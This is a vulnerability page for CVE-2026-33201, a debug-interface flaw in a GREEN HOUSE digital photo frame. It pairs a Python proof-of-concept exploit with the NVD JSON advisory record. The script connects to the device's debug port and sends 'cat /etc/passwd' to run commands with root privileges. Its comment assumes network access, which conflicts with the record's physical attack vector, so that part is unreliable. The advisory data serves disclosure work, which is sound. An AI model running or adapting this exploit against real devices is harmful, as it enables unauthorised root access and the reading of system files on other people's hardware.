CVE-2026-33201

import socket import time # PoC for CVE-2026-33201 # Target: GREEN HOUSE GH-WDF10A # Description: Connects to the active debug interface (assumed network enabled for PoC) # to execute commands with root privileges. TARGET_IP = "192.168.1.100" PORT = 2323 def exploit(): try: print(f"[*] Connecting to {TARGET_IP}:{PORT}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((TARGET_IP, PORT)) # Receive initial banner banner = s.recv(1024).decode('utf-8', errors='ignore') print(f"[+] Connected. Banner: {banner.strip()}") # Send command to read /etc/passwd payload = "cat /etc/passwd\n" s.send(payload.encode()) time.sleep(1) response = s.recv(4096).decode('utf-8', errors='ignore') print(f"[+] Command Output:\n{response}") s.close() except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-33201", "sourceIdentifier": "[email protected]", "published": "2026-03-26T05:16:39.607", "lastModified": "2026-03-26T15:13:15.790", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Digital Photo Frame GH-WDF10A provided by GREEN HOUSE CO., LTD. contains an active debug code vulnerability. If this vulnerability is exploited, files or configurations on the affected device may be read or written, or arbitrary files may be executed with root privileges."}, {"lang": "es", "value": "El Marco de Fotos Digital GH-WDF10A proporcionado por GREEN HOUSE CO., LTD. contiene una vulnerabilidad de código de depuración activo. Si esta vulnerabilidad es explotada, los archivos o configuraciones en el dispositivo afectado pueden ser leídos o escritos, o archivos arbitrarios pueden ser ejecutados con privilegios de root."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-489"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN18035227/", "source": "[email protected]"}, {"url": "https://www.green-house.co.jp/note/info_gh-wdf10a/", "source": "[email protected]"}]}}